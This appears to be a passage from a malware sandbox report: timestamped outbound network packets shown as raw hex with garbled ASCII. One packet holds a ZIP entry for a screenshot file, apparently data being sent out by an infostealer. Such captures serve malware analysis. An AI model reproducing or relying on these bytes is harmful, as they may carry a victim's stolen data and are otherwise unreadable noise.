                                                                                      2023-05-22 17:50:27 UTC195OUTData Raw: 2b 5c 31 f6 42 5f 50 46 f5 6f e4 59 bb cf ad a7 f7 15 4e 3c 4c 67 2a 33 3d 0a 36 ea 59 bc 66 42 14 9a 9d 9d c8 c4 13 ae 4b 3f bd de c3 b9 10 1c a8 2c a9 90 1e f9 b2 7c db b9 7c 66 aa 6f b5 8f 55 46 30 77 de cb b9 46 e3 6f e6 6b db f2 eb f7 7b 38 4b e0 22 0a 7b 1a 2f e2 cc e6 b5 9c ef 13 62 23 3b e8 6a 52 a0 72 77 ed 5f 0e 60 a6 68 8a 1e 7d ac 3f e3 f8 2b 86 29 ea ff fd 5b 53 07 84 ad af 8a 24 18 fc 27 00 5f 54 4c 09 4c 21 a4 04 83 d5 79 85 00 a4 94 61 46 28 d0 36 44 5d a4 01 11 26 95 c2 72 0d b4 09 65 5b 27 10 46 88 3e d9 fc 59 34 5a 17 1e a2 43 01 fe 46 b1 84 46 68 2b 73 62 93 d0 ca 40 02 a9 ef 04 4c 19 9b 71 13 a2 4d ea b4 22 ae ad 7e 5d b5 46 79 53 b9 40 52 59 16 ed e2 00 bc 63 83 44 fe d7 41 86 5c 04 48 0a d5 d3 91 5a f4 38 e8 22 94 0b 71 f9 aa 61 b2
                                                                                      Data Ascii: +\1B_PFoYN<Lg*3=6YfBK?,||foUF0wFok{8K"{/b#;jRrw_`h}?+)[S$'_TLL!yaF(6D]&re['F>Y4ZCFFh+sb@LqM"~]FyS@RYcDA\HZ8"qa
                                                                                      2023-05-22 17:50:27 UTC211OUTData Raw: d2 d9 ed 90 40 da 30 8c 19 b1 de ab 81 ff e9 70 2b ec aa e0 ba 7c d3 1a 9b 83 db 6d 33 7d 23 fb ad bd dc e3 21 ae a7 8a 42 af f3 87 ef d8 88 fc ae 08 cc 48 0d 58 dd e5 d9 f2 0f 71 58 cf db 24 b3 a0 10 b4 0a bf 79 8b da c6 d5 8a cf 43 c4 b4 25 0c 13 99 c5 26 f6 6c ab d0 bc 31 60 6d 8a 28 6e 04 90 25 ce 2f c7 0b ba 88 f8 08 25 95 36 89 96 89 6d 36 8e fa a3 b9 27 10 17 18 cb f0 4f cb 28 33 59 91 a9 ad 10 30 08 a6 d8 0d 2b 49 6a cf 83 c1 70 c5 60 d8 40 bf 05 cf b5 e7 24 3e 22 64 c1 3d 89 54 42 70 d7 eb 27 b0 61 4f 56 ea 09 e9 08 52 30 4f b0 2e a7 30 be 68 26 b3 2e b8 9d ad 80 4d b8 a2 79 a7 14 f4 f9 0a 94 d4 c9 9c 4f 70 71 01 3b f8 19 c0 7e cf a7 88 42 c6 95 8c cd 79 8c 32 c4 20 59 e4 64 86 29 26 91 3a e5 61 e1 e1 98 68 10 ba 4f 0a 12 93 af 33 4d e5 86 56 40
                                                                                      Data Ascii: @0p+|m3}#!BHXqX$yC%&l1`m(n%/%6m6'O(3Y0+Ijp`@$>"d=TBp'aOVR0O.0h&.MyOpq;~By2 Yd)&:ahO3MV@
                                                                                      2023-05-22 17:50:27 UTC227OUTData Raw: 86 71 fb 0b ca 66 5e b5 c5 ea 60 90 f2 99 9d 70 8c 8c e4 c1 a9 1c 97 2c c7 d6 fd c1 1f 20 ff a9 bc 39 2b ae f7 73 b7 0c 2f 35 37 9a d9 61 b9 8a 50 4a fa aa 12 a5 e1 85 37 be e4 0b bc 4c 1e 4d 83 2b 9a 42 a6 f7 c6 3b 97 4c 7e 81 1b 58 65 f4 af 96 20 8c 42 ef 40 45 88 a5 30 90 b5 34 b1 84 31 3b 7f 8a 5e b2 86 9e 7e 46 ef 76 c1 4a df 1d 63 a2 07 bd 0e 9b 89 99 6e 09 cb 4e 09 85 32 17 79 0e 2b 5d c2 48 2f 22 f0 14 02 a7 27 32 40 20 70 10 54 1a 80 13 1d 28 98 7e 76 19 31 15 ad c3 4c 3f 32 16 5c c2 8c cf 10 4d a4 72 c7 21 b1 ee 4b ca ee 80 40 7d 8c 75 f7 20 f3 72 c7 2b 18 c2 8d 70 90 49 7b f1 49 4d 8f af 16 f8 84 d8 38 6f 82 64 3a 36 88 cb 1d 18 9c 19 dc 90 19 54 c6 48 c1 7a 31 a6 72 10 70 0a 70 f5 a7 28 6b b4 34 59 9e 83 0c ce 64 75 79 3e 0b bc c2 12 3d 7a 9a
                                                                                      Data Ascii: qf^`p, 9+s/57aPJ7LM+B;L~Xe B@E041;^~FvJcnN2y+]H/"'2@ pT(~v1L?2\Mr!K@}u r+pI{IM8od:6THz1rpp(k4Yduy>=z
                                                                                      2023-05-22 17:50:27 UTC243OUTData Raw: c0 61 c6 97 32 b5 75 08 78 71 30 c9 46 15 21 66 e7 70 92 b1 d2 85 10 f4 81 9c fc de 1e 87 a6 82 22 bb ff ae 62 7e 11 88 80 2d 2e fe 04 84 69 99 68 29 83 39 36 67 10 d0 d8 b3 a4 60 1c 9e f4 23 7e a4 1e 19 88 eb 80 86 90 64 b6 38 4c 25 e4 24 6c 06 06 57 c0 86 4c ae fb b4 8f 85 c6 01 aa d1 21 42 ac f8 0c 81 8d 5e df 75 dd 46 c9 0d 13 23 fe 9d d2 06 d9 49 15 32 5b e8 1e 40 30 46 ed f0 5b 69 73 4c b2 d1 6b ff f3 d4 2f b1 63 ec 94 d5 59 17 cc fd 5e 64 0f 99 24 82 94 16 aa ad 4c 69 71 34 d4 7b 27 e4 10 ed 38 46 ec 72 16 45 94 d5 de 8b 16 32 af 2f 9d 88 ba c3 f0 f3 4a 04 3f 04 95 5e fe 3c 5e 3a 3e 47 08 b3 ac 8f a0 68 e5 65 7e 63 19 3e f3 18 a9 7b a6 6e ed a8 2e 28 e8 dd 2c f0 85 a8 fd f1 3f 34 27 19 c8 cd 6d af 69 66 0e 1f 43 9e dc af ac 5d ff 5c e8 e0 76 bb 66
                                                                                      Data Ascii: a2uxq0F!fp"b~-.ih)96g`#~d8L%$lWL!B^uF#I2[@0F[isLk/cY^d$Liq4{'8FrE2/J?^<^:>Ghe~c>{n.(,?4'mifC]\vf
                                                                                      2023-05-22 17:50:27 UTC259OUTData Raw: 46 e6 fc 61 42 e5 5d 15 2a 20 09 d3 59 0c df 77 28 2f 26 ae 18 a4 05 16 bb df 1a be a0 db fb 59 71 70 13 06 7c 53 de fd e3 6e 72 3a d1 8d dc 36 28 34 e9 f0 1d 89 94 fb 31 87 31 8c aa 92 e6 bf ce 13 1b c8 13 ba 6b 53 e3 c7 3c c6 a1 dd d0 df 4b 05 ba 10 fe df af 28 9b 1f df 01 98 fc d1 2b 86 e1 86 7b 1f 5d f6 06 f6 dc bb df 8b 2e 8a 3b 57 05 73 b8 5d ae 7e 5f e9 fd bd 79 da 39 71 af 29 c8 c0 5c 6c ff 4b 6f 5a 27 ff f3 fd 05 e3 c1 d1 c1 0d cd b5 56 b3 28 cf 31 72 71 b1 7c 69 41 d9 9e 82 27 1b 88 df f3 20 85 9d ce de 33 15 5f 29 af 53 a4 02 7a b2 a0 8e f1 d7 d9 4e ff f4 65 5f 00 3f b0 e5 e9 e5 7c 47 26 6b 3d 39 e2 8a 13 cb 70 01 ec 76 d7 a3 b7 a6 11 69 65 2e c9 bf 12 9d a4 39 c2 b7 ef b7 ed 2d 76 4e 7f da f1 ec 90 df dc 8f 9b 5b 9f 11 e9 ff 1e 55 4b 05 4c 26
                                                                                      Data Ascii: FaB]* Yw(/&Yqp|Snr:6(411kS<K(+{].;Ws]~_y9q)\lKoZ'V(1rq|iA' 3_)SzNe_?|G&k=9pvie.9-vN[UKL&
                                                                                      2023-05-22 17:50:27 UTC275OUTData Raw: d6 e0 43 18 7a 8a 69 1d e2 99 98 f2 07 cd 71 b3 b1 f3 12 f0 7c 6e f9 01 25 87 35 18 df 65 f0 da b9 60 c3 31 bf 61 54 d2 d6 fd 7b de 05 b9 21 cf d8 0e b7 92 04 ed b1 89 a1 80 86 45 ef 3d 8f 58 f5 6a 7b 57 42 b7 89 b9 cf 74 82 57 50 8f 51 44 7d 26 f4 96 93 12 55 4c 01 0d b6 4e 4f 11 af d7 5f fc f9 96 ea 69 57 36 a3 e8 28 e5 b2 0e 39 83 b1 9a 55 74 82 2c 08 f8 2e be 82 57 88 91 c7 32 cf 9c 9c 57 88 8c 0d a2 ad 7e 9f 86 b4 f3 86 2a 0d c2 63 fe 7d ac 67 b6 a1 5c bd 22 50 e4 ac df f2 5b d8 6f 36 26 be d3 f1 31 83 e5 c7 76 97 00 dd 41 df ca 82 8b 4f fa 47 b1 01 c2 5b be 6e f1 e7 e2 92 4b 47 db a7 bf 94 b6 59 f6 aa c3 76 74 8f 6a d2 83 5e ac f9 33 a4 73 d0 2c 9c c4 ff b2 1c 48 1d 33 bf f7 4a ae ee 48 69 aa d1 cf f2 4d 60 99 2e d7 51 d1 c6 90 ee e0 b4 ea e8 6d 19
                                                                                      Data Ascii: Cziq|n%5e`1aT{!E=Xj{WBtWPQD}&ULNO_iW6(9Ut,.W2W~*c}g\"P[o6&1vAOG[nKGYvtj^3s,H3JHiM`.Qm
                                                                                      2023-05-22 17:50:27 UTC291OUTData Raw: 63 bb 8e d4 bb 68 2d 2a ff b3 91 95 00 6e c4 7a a7 3d 29 27 4f a6 d9 ca 18 af 04 db d6 8b a4 15 a4 95 48 0a b1 6a c5 f5 7f 8d 5c 32 7b d6 7c 4f b5 c8 a0 a5 07 36 80 79 c1 33 12 c1 e3 17 31 14 4e 50 8a 18 ca 47 9a 7f b6 75 11 8f e6 83 ec eb 22 ad 1e 7f fe 0e 0d f1 2f fd 6c ea 2a 68 95 86 fe ab fb fd f3 61 9a 53 64 a2 d8 55 69 07 b7 94 04 2b c1 ef 89 9f f5 07 ac 92 32 9b 5e 25 4c 8e 5e 17 2d 90 e2 12 4c 56 b4 31 10 3a 21 91 e4 5e c2 28 bf fe 3d d3 f6 8c c3 6f 33 d9 8d af 9d c4 0c 5b d9 1e 0b b4 f1 74 4e e2 97 44 be 4e 2d 02 c4 a5 d1 48 30 77 01 ca c7 07 61 84 09 40 90 ba af 64 64 45 cf 64 24 09 c0 c2 1b 51 48 9d 48 46 08 64 56 78 69 8d d8 a2 ce a2 ce 93 87 64 b7 6c a4 55 b6 64 5a 63 5f 20 a9 db 32 32 4d e0 26 bc a8 4f ec 68 8e b8 6c 6c 6a 03 e9 1f 4b c9 48
                                                                                      Data Ascii: ch-*nz=)'OHj\2{|O6y31NPGu"/l*haSdUi+2^%L^-LV1:!^(=o3[tNDN-H0wa@ddEd$QHHFdVxidlUdZc_ 22M&OhlljKH
                                                                                      2023-05-22 17:50:28 UTC307OUTData Raw: 59 2d ac 3b da a3 e5 7a a0 07 59 09 2b c7 f4 d2 d0 42 02 7c 2b b2 15 06 4c 1c 2e 8e 4c e0 e9 78 b0 a6 cc 8c 3c 39 1d 12 d0 ab 02 ff aa 05 5c 2c 01 3c 96 19 ce 9c 62 c3 b5 42 3f 63 ef 4c df dc a5 67 70 e3 23 05 cc cc 89 25 fa 15 e8 8e 9f 65 4c f4 dc 49 28 4c a4 3b a7 03 86 5c 28 04 a6 8f 8d bf 21 1a fb 16 b8 db 1d 0d fc db ab 62 63 84 41 d0 4f eb ff cb 75 96 60 a1 e7 1f c2 af f2 c2 80 b1 18 a3 2d c1 03 08 8b 53 11 18 80 28 1b 0d 52 58 b2 71 ec 50 f5 0c 67 8f 32 1c 03 7e 46 1b e0 da 85 44 2a d7 6f 74 27 ed 0e 35 aa 92 3b 9e 19 dc 89 ee 5c 28 cf e7 60 01 6c 5d a1 79 1a ad 84 ca 40 62 2d 15 b5 06 1e a1 43 7d 69 9f 97 6f 90 87 cf c3 05 01 73 80 83 25 71 c3 24 6d d9 f8 7a 20 18 a0 f7 76 da 43 32 a0 0c ae e7 88 8d e5 04 0b 54 ca 52 16 92 ef 7c 97 98 0a 43 b7 be
                                                                                      Data Ascii: Y-;zY+B|+L.Lx<9\,<bB?cLgp#%eLI(L;\(!bcAOu`-S(RXqPg2~FD*ot'5;\(`l]y@b-C}ios%q$mz vC2TR|C
                                                                                      2023-05-22 17:50:28 UTC323OUTData Raw: a7 3c fb 01 66 37 f8 4e 34 dd b6 4f 48 6b e9 59 c5 45 de 0b 5a d7 14 9a f4 34 14 ec e3 97 b1 5a 90 5f 52 0c 17 77 13 f4 37 a6 30 26 95 e8 fe 27 e2 49 72 de e3 72 ee e1 e1 de f6 ac 72 37 a7 c2 1f 13 1e 22 91 7f 01 98 c8 ff 06 c0 a8 8a fe 05 60 14 c7 43 ff 0b 50 4b 03 04 14 00 00 00 08 00 3b 9e b6 56 59 ff 80 d7 5e f4 00 00 65 2c 01 00 2e 00 24 00 53 63 72 65 65 6e 73 68 6f 74 73 2f 53 63 72 65 65 6e 73 68 6f 74 5f 32 32 2e 30 35 2e 32 30 32 33 2d 32 30 2e 34 37 2e 34 39 2e 6a 70 67 0a 00 20 00 00 00 00 00 01 00 18 00 ea 0c 88 41 21 8d d9 01 ea 0c 88 41 21 8d d9 01 35 21 7c 41 21 8d d9 01 ec bc 75 58 94 5d d7 37 7c d2 21 88 c0 20 21 a5 80 30 84 48 2a 25 20 0e 29 35 74 2b 21 25 20 20 0d 0e 06 88 43 49 77 77 8b d2 a0 48 77 a7 48 77 48 77 cd bc 27 7a 5f d7 e5
                                                                                      Data Ascii: <f7N4OHkYEZ4Z_Rw70&'Irrr7"`CPK;VY^e,.$Screenshots/Screenshot_22.05.2023-20.47.49.jpg A!A!5!|A!uX]7|! !0H*% )5t+!% CIwwHwHwHw'z_
                                                                                      2023-05-22 17:50:28 UTC338OUTData Raw: 2b ba cc b2 2c c6 dc 2b cf 9f d4 fb ae e0 c8 1f 69 eb 8d ff c6 c2 c8 94 3a e4 25 33 94 9a bd 62 ed 75 7f cd 8f 80 00 cd c0 16 3f 81 b5 b2 97 1b 4e eb 70 e7 72 04 2f 6e e8 86 34 cf 9d c3 f0 b0 ba 43 8a 08 ed 76 c5 bb 7b b5 73 76 ad c3 f1 a9 61 0f 57 8b 6c f8 bf 17 90 c8 7c f1 f0 92 7b be 26 76 55 af d8 7a 91 3b f1 b8 da 0c ab f3 5b 60 f2 17 97 a7 cb c2 8e 8d 6f eb bf 30 94 86 1e 6c a0 76 36 be 2b 97 bf 6a 3b d0 e7 63 46 8e 90 46 1d 07 3c 6b 0b 78 e4 2d 48 14 76 f8 f6 85 66 87 61 4d b0 96 a2 8c ea a0 53 47 4c 5a 60 a4 90 4d e9 4d 5f d3 71 07 7b 26 8e 69 da f8 00 c7 58 af cd 77 fb 7a 45 a4 e3 6b 82 77 5c dc 4d 43 9b df 33 96 57 3d 9b 65 56 c9 cd 9f 7e d5 42 48 20 d6 ad 84 63 9c a6 21 c2 3a b5 fb 74 a8 3d 4c b1 16 a4 5c 16 6a 4f 9f ca 18 c6 a8 6e 1f 53 b3 20
                                                                                      Data Ascii: +,+i:%3bu?Npr/n4Cv{svaWl|{&vUz;[`o0lv6+j;cFF<kx-HvfaMSGLZ`MM_q{&iXwzEkw\MC3W=eV~BH c!:t=L\jOnS
                                                                                      2023-05-22 17:50:28 UTC354OUTData Raw: 8f cc 64 b0 cc 20 2b b9 0a 79 91 39 30 4c 2a 1a fb 1e 61 58 6a 56 34 14 6d 0e bf c4 ce 92 81 24 fb ec 4c a3 a6 9e 1d 45 a6 a6 8a 00 b8 a2 5c 32 09 5c 79 2d 63 05 d4 97 df 6c cb 23 d2 ee 64 46 ec a5 0b 7e 50 bf 40 28 a0 46 17 9d 16 c1 35 94 f9 5e 69 5d b3 2f 52 5a 0e 74 45 0e 62 42 47 04 82 d6 82 24 d5 98 3c d9 1f a5 68 c8 98 22 84 fb 40 96 80 66 01 dc e3 c5 1a 75 af e8 09 4a 4d 6d 98 b4 89 c7 39 cd fb 09 c1 6d 84 2b 44 4c 99 5c 96 f4 eb 05 f8 8b b4 38 72 97 bb 33 72 20 50 43 7c bc 9a b7 24 fb a5 6f 20 c9 7b ec 5c f8 2c 19 28 15 fa 8b 49 70 4b 14 fc 52 e3 16 f2 62 88 da ae 42 e4 93 74 32 15 96 9b e7 47 bd 94 36 c5 ee 9a 84 38 ca cb 81 e0 d3 f8 32 f8 77 e1 ae 64 77 f5 f8 6b 1e 25 dc 46 61 12 b0 00 71 9d 1f af 9b b4 36 fd e2 40 b8 08 4a 1f 0b 48 cd 03 cf 82
                                                                                      Data Ascii: d +y90L*aXjV4m$LE\2\y-cl#dF~P@(F5^i]/RZtEbBG$<h"@fuJMm9m+DL\8r3r PC|$o {\,(IpKRbBt2G682wdwk%Faq6@JH
                                                                                      2023-05-22 17:50:28 UTC370OUTData Raw: 27 fb f8 40 3d 73 27 ce d4 2b be c1 f0 8a 67 fc e7 e0 ce f0 53 e9 3a 19 0b 1a e3 64 ac 19 39 9f f4 92 7e 4d 3e 8d 48 6a b9 b8 32 1d 8e 96 4c 3f 1f 68 d0 bc 2e 1a 14 4b 79 5c 62 d8 d9 ad da a5 43 58 ba 74 60 4b e1 65 da 9f b4 cf 1d 7f 7c f1 8b 03 03 ba e7 93 b1 b6 0c 01 42 b1 cd f0 bc 42 f0 cd 8f 27 52 eb 2e 23 7f f6 8f 3c 64 27 3e f2 3b fe cb 7f e2 b9 bb c6 b3 b8 93 85 6d 63 f1 06 9e fb ba bb 30 4b 71 25 c6 9f de 6f f5 36 e2 d5 2b 6b 23 6d 45 46 2f 99 78 28 41 8e 86 b6 25 4e 2b 5e 4a 3e 24 75 b2 15 b4 0a 12 8d 7c 22 47 35 2b fd c1 5e 4b 70 4a b0 ae cb dd 47 2b b8 14 37 ac 6b 6f 97 e8 f2 2d 3a a8 8d ec 6d 35 2f 0a f3 bf 86 b9 48 0e 88 d7 94 b5 b9 58 69 df be 67 e0 13 e6 4b b7 cc bc 59 f8 e3 16 ef 9f 07 6e fe b7 91 b1 66 ba 37 e1 f1 22 bc 10 66 ae 99 dc 19
                                                                                      Data Ascii: '@=s'+gS:d9~M>Hj2L?h.Ky\bCXt`Ke|BB'R.#<d'>;mc0Kq%o6+k#mEF/x(A%N+^J>$u|"G5+^KpJG+7ko-:m5/HXigKYnf7"f
                                                                                      2023-05-22 17:50:28 UTC386OUTData Raw: 0d 33 10 cc 22 03 1f d1 40 dd 08 1a a8 86 8b 64 83 69 f2 be d5 08 aa a1 f6 dd 4e a6 6f f0 cc 54 17 b0 01 e0 4d 7c ed e6 6c bb b9 29 ec f0 b8 a6 8c 7e c9 e0 dd 7e 19 4a c1 ce 85 8a fc cd 64 61 4d 92 f8 b8 b5 0b 8f c3 d3 cc d3 59 dc 82 8e 1e 72 b1 0e 7b 69 a6 dc fd e4 16 2f e9 07 87 ef 44 56 f0 d7 5d ae 26 ae 69 0b b9 70 92 c9 f9 a8 8e 35 d3 7e 20 18 29 0f 87 78 11 57 ae e8 55 cb 34 54 28 bf 6e 87 68 3b 6f cf de 9a 70 1b d7 25 49 de cc 88 9a da a6 04 ad 50 2a 84 06 a4 1c be ee f2 49 9c 70 a8 22 3e b5 da d0 73 59 e8 f7 50 41 4c 91 3e 30 55 e6 34 9f f6 f6 a9 23 22 43 34 30 4a 83 06 52 2b e4 10 37 0a c6 c9 c6 23 4c d0 00 8f ac e9 80 4e 41 ab 9f 72 a4 38 82 0b 8a 43 2c a4 0e c5 c6 f8 b6 a2 7c 33 04 64 10 c0 6d 6d 30 28 b0 84 d4 f0 20 d9 49 c1 98 7c 7c a5 55 02
                                                                                      Data Ascii: 3"@diNoTM|l)~~JdaMYr{i/DV]&ip5~ )xWU4T(nh;op%IP*Ip">sYPAL>0U4#"C40JR+7#LNAr8C,|3dmm0( I||U
                                                                                      2023-05-22 17:50:28 UTC402OUTData Raw: f4 8c c0 3e 16 0b 68 b2 0b d1 93 be 05 86 8e fa bc 1b 14 e9 54 e3 e6 9e 3c 05 54 3b ff cc dd 83 87 bf a0 b7 42 15 89 77 8f c5 d0 1e 3e 1b 64 9e 4e 12 94 84 ef dc 56 9b 25 38 d4 70 a8 b1 cb 8d 49 a3 0c fe 06 f4 a0 da 7f 3f d3 87 de d2 31 1e 4a 35 1d 60 e4 bc 53 ef 57 f3 32 3f ba ba 2f ba 39 fa 7d d1 04 0c fe 85 a1 b5 c2 fc 47 6f 7b 0a 35 86 1f c1 28 a4 fb 60 53 73 48 9e c9 0f 6f 82 bd 1e 5f 60 78 66 46 cc 8c d8 68 65 79 75 0a a9 c7 f3 4d b7 ac 82 5b 02 28 03 2c fd 52 46 67 75 7b e9 48 f4 c3 ad 2a d8 4a 34 51 e7 e5 04 28 af e9 bd 23 5b f9 fc b5 31 39 7a 71 e7 67 02 01 6a 07 1a 72 99 a2 4e 6c af ec de eb b2 1a 07 dd 49 62 2a f6 6f e1 06 d0 88 ed 65 b9 cc f7 1b 6e aa 0b 0d 19 06 91 30 59 e9 a5 0a 24 8e 4a 9c 73 ca d6 7e 30 a6 4b bc 4a 04 94 d1 ad 9a 25 33 9a
                                                                                      Data Ascii: >hT<T;Bw>dNV%8pI?1J5`SW2?/9}Go{5(`SsHo_`xfFheyuM[(,RFgu{H*J4Q(#[19zqgjrNlIb*oen0Y$Js~0KJ%3
                                                                                      2023-05-22 17:50:28 UTC418OUTData Raw: 55 70 d8 67 a8 26 01 94 f6 1a 3d 59 dd e1 ea 0f 35 aa f0 28 e6 6d 70 48 6a 1c 04 2f 60 62 2a 38 1c 3c 5c c4 45 0b 45 0b 01 76 cb 0a 2a 05 d6 78 14 8a de f1 67 bf ac 39 ae 82 bb c2 23 32 f1 19 f3 0e 31 5d d5 40 71 5f d3 e1 6b 94 fd 98 7b 15 fb 36 81 d5 ef 4c 30 6d f6 6f a0 26 76 a6 f9 7c 88 c0 54 ea 7e c4 91 3b 91 ef ee a0 17 aa da d0 f7 28 bd e6 ba 20 2c 4a b6 c1 79 bf cd 7e ab 3c d7 e9 cb d2 ea b9 8e 77 f8 a3 48 e1 72 f6 4d 59 7d c1 b9 0f 8a 59 af 6c 1f d7 e1 be 3d 93 7a ca 4f 2b f1 90 1d ab 9d be 58 1f ff f3 6e 2e 66 9f c9 78 3c d9 25 72 ff 6b c7 ed 9a 32 b1 a8 9b 17 03 83 be 2b 1b 4f 0a 6a 4b 79 08 ee 7e aa bd 9a 58 b5 e9 11 20 65 20 db 09 c3 45 9c 6e 73 78 cc 12 30 33 5b 1f 3e ad b7 e2 9a fd 4c d3 5c 53 3e e5 c9 fe c5 8b 6f f3 bf f9 9d 3e 73 41 21 b1
                                                                                      Data Ascii: Upg&=Y5(mpHj/`b*8<\EEv*xg9#21]@q_k{6L0mo&v|T~;( ,Jy~<wHrMY}Yl=zO+Xn.fx<%rk2+OjKy~X e Ensx03[>L\S>o>sA!
                                                                                      2023-05-22 17:50:28 UTC434OUTData Raw: 94 6f 92 43 a5 53 22 64 5f 07 fc 96 09 88 5e 38 7a 62 37 99 f0 2a a6 f9 dc f7 27 b7 65 7b 9d 3e 78 55 e9 d5 ef a4 d9 ee ff 79 8c 24 39 b5 ab 22 bb f5 0c db ba f3 78 0f 34 d0 7d d1 da ab c9 96 d0 ba 6a dd 10 fd df ef 2a be ec 3d b1 32 31 df aa 49 7d fe 73 fa 7b 1f 51 50 51 fa fb c3 06 03 23 76 44 00 4c 45 3d be b8 a3 be 6b 2c ea be b1 2c bb 7b 47 39 b5 62 b2 ee 90 45 41 77 0b cb 23 15 35 08 16 bb bc c1 bf 1f 50 2f be d8 ff a7 b6 2f 8f 87 f2 eb ff 1e 64 49 a1 34 22 59 b3 0e 0d 62 c8 be 36 84 c4 d8 f7 3d 8c c9 be ef 5b a8 b1 65 2d 94 b1 2f 15 92 3d 5b 08 45 b6 41 32 42 96 48 76 b2 6f cf 35 a3 ef 7d ff 9e e7 f9 fd ee e7 af e7 8f b9 9c d7 75 ce 75 ae b3 7c 96 f7 fb 7c 3e 33 4a 27 30 d1 b0 00 2a 89 9a df 8c e8 ae 73 9a c7 ad 55 ce 2e ed 1c 5b fd 8e 16 95 be 2e
                                                                                      Data Ascii: oCS"d_^8zb7*'e{>xUy$9"x4}j*=21I}s{QPQ#vDLE=k,,{G9bEAw#5P//dI4"Yb6=[e-/=[EA2BHvo5}uu||>3J'0*sU.[.
                                                                                      2023-05-22 17:50:28 UTC450OUTData Raw: 7c 70 43 5f 01 3d 3d 59 80 8e f6 8b 05 f4 68 94 5e 0e 63 6e 72 a4 05 3d ad c3 0b d0 dc d4 47 b9 f1 04 07 48 8f 6e 4e 37 6d 57 18 84 94 08 76 11 21 b1 88 32 d1 33 46 19 83 31 28 e5 1d 68 d5 73 43 f5 fe 89 2e a1 08 e6 10 de 44 0b 5a 2e e2 9f 5b 97 9a 03 86 2e da ad 67 47 c8 28 e1 43 d0 04 24 0e 80 1b d1 7c c3 08 9a 70 07 f2 f2 c8 51 02 ce ee e0 e1 a1 50 04 38 e8 51 60 5e c6 7f b3 96 e0 1b 54 ba 2b 78 3d f1 21 02 f1 04 fb 8d 10 24 4e 2b 2f 1d 80 e1 b5 f2 54 1b 70 38 8f 53 f7 99 61 89 53 a6 cf 22 41 4d 10 cb a2 ea 0d 06 5d 24 8e e9 6f aa f1 9f 67 bd a4 cb 44 9f 4c 00 cc 36 48 68 d0 74 fd 9b 86 44 81 97 95 48 62 83 02 79 15 60 5c e6 4d 51 05 2f ee e0 31 41 89 05 14 82 83 00 01 09 7b 82 83 69 e5 80 4f 8b 8d 66 84 72 23 31 82 68 d0 af bc 3a a4 9b b7 72 90 11 c5
                                                                                      Data Ascii: |pC_==Yh^cnr=GHnN7mWv!23F1(hsC.DZ.[.gG(C$|pQP8Q`^T+x=!$N+/Tp8SaS"AM]$ogDL6HhtDHby`\MQ/1A{iOfr#1h:r
                                                                                      2023-05-22 17:50:28 UTC466OUTData Raw: e2 0f 32 b4 42 08 ce 9b 14 5e 44 51 8c 9c 2e 72 37 e7 69 cf 25 8c 93 3d d2 b9 d2 29 2d c9 a8 6b e2 68 cb ed b8 86 0c a7 b0 9e 2e b3 59 5f 0c 29 48 a5 24 24 89 1f 62 44 cd e5 0c 0e 80 e1 73 b4 50 d0 0a 2d 0a cd ea f0 dd 78 66 22 2e 95 55 ad 7f 26 1a 88 cf a4 99 91 1a df d5 00 b1 75 2d 25 54 68 93 36 28 ba 73 a5 84 cb 66 11 67 c0 8c 36 a3 dc ae 78 c0 d2 68 ee d3 44 98 38 a2 47 d2 60 d8 a1 94 9b 01 49 30 2b 8e 31 12 ce 2c 44 65 e2 65 63 0b 96 08 18 96 a8 77 e5 cf 75 67 24 75 eb d1 f9 0e 9b b0 a5 62 76 fe 5f 39 e2 58 06 dd b1 06 3c 43 d9 30 83 f2 ba a9 0e a3 2c b7 5c aa 16 7e a9 48 40 57 c0 ac 01 03 be 3d 66 5b 48 7c f2 a5 f8 97 91 a2 83 4a c0 31 d0 07 4b 9c 0e a8 b0 d2 2e df 9c 1a f8 34 09 c0 2c d1 46 2e 04 6d f2 da 13 5e 7c e1 6a 32 a1 f6 63 d1 a0 e5 e5 1d
                                                                                      Data Ascii: 2B^DQ.r7i%=)-kh.Y_)H$$bDsP-xf".U&u-%Th6(sfg6xhD8G`I0+1,Deecwug$ubv_9X<C0,\~H@W=f[H|J1K.4,F.m^|j2c
                                                                                      2023-05-22 17:50:28 UTC482OUTData Raw: b8 82 d7 cd c6 e4 73 1c 06 94 7d 15 87 bd 8c b1 1b a0 fd d3 e2 55 2c bb ae 7f 6a 70 d7 17 fb 9d 95 3b 13 88 c9 b8 d7 b7 bb c3 eb a3 bd 24 02 12 a8 67 aa 8b 9f db bd 61 1e cf 90 6c 78 f4 31 6e 1c fc ed 4d 53 63 43 8a ea 72 d3 79 cf 49 5b b9 0b 6f ef 4b 2b 34 af f2 d8 15 76 08 a9 5d 7d 2d a6 d6 82 75 06 b8 1b 29 ee ce 09 e8 98 f6 d0 9f 9a cf 7e 88 2b 79 ac 0f 04 a7 d6 74 49 4e b0 d6 85 2f 9c 03 25 00 91 60 a9 37 80 12 8b 92 20 68 8a e5 25 21 dc a7 5c 46 dc 1a 12 51 94 d4 79 41 ee d2 29 34 70 95 c9 b8 fb 38 41 87 39 23 09 3d 99 d5 59 12 87 b6 14 65 44 95 c1 c2 60 38 c6 16 a8 08 56 b9 8b c1 8c a8 1a d3 fd 84 22 b0 0f 80 dd 1b cf c8 41 2c 61 e1 25 8c 2d da d7 9e 21 20 25 59 60 d8 c0 a8 8f 6a a5 24 c0 54 26 09 b7 12 49 90 3e 1c c2 32 6b cd bc 0c ec b3 68 15 eb
                                                                                      Data Ascii: s}U,jp;$galx1nMScCryI[oK+4v]}-u)~+ytIN/%`7 h%!\FQyA)4p8A9#=YeD`8V"A,a%-! %Y`j$T&I>2kh
                                                                                      2023-05-22 17:50:28 UTC498OUTData Raw: 5e 0f 64 ef 3a b4 7d df 32 9f cf 66 2c 08 7c d4 6b f0 bb 77 64 c1 30 e9 e4 2b 5b c2 db ed f5 94 e9 25 ae ba e1 b1 80 8f 59 d5 72 41 c6 77 05 ab 24 3d e5 6e de 6c 99 d8 49 53 d9 c3 4e f1 6f 69 7f 9f 8d 79 66 29 e4 ba 76 cf 6a 1b ca ca b9 d5 bc 3f b4 0f 0b ab 7a 9b ba 79 43 bc d6 e0 17 3f 97 d1 ac 09 8e ba 94 b3 5b d6 53 25 f1 bb 57 c0 6f 9d 23 83 73 af 50 3d 68 9f d6 b7 1e 3e bd c5 c3 55 b2 c3 3d 70 0f a7 60 fb dc b6 6d 49 e8 46 05 55 9f 90 d1 c7 97 10 36 0d d5 4a b0 9d 5f e7 20 ca f9 07 1e 6c f3 db 1b a2 3d 8d 67 3d 6a f0 fa 75 76 6b 92 8e 61 7a 4b 56 6f fc 44 f6 1a 0d ee ba 2f cd 1f 5a e8 e3 14 50 95 7e 37 c5 a4 20 9a 5f 24 2d 24 d1 25 23 b8 2a 51 59 6d 55 22 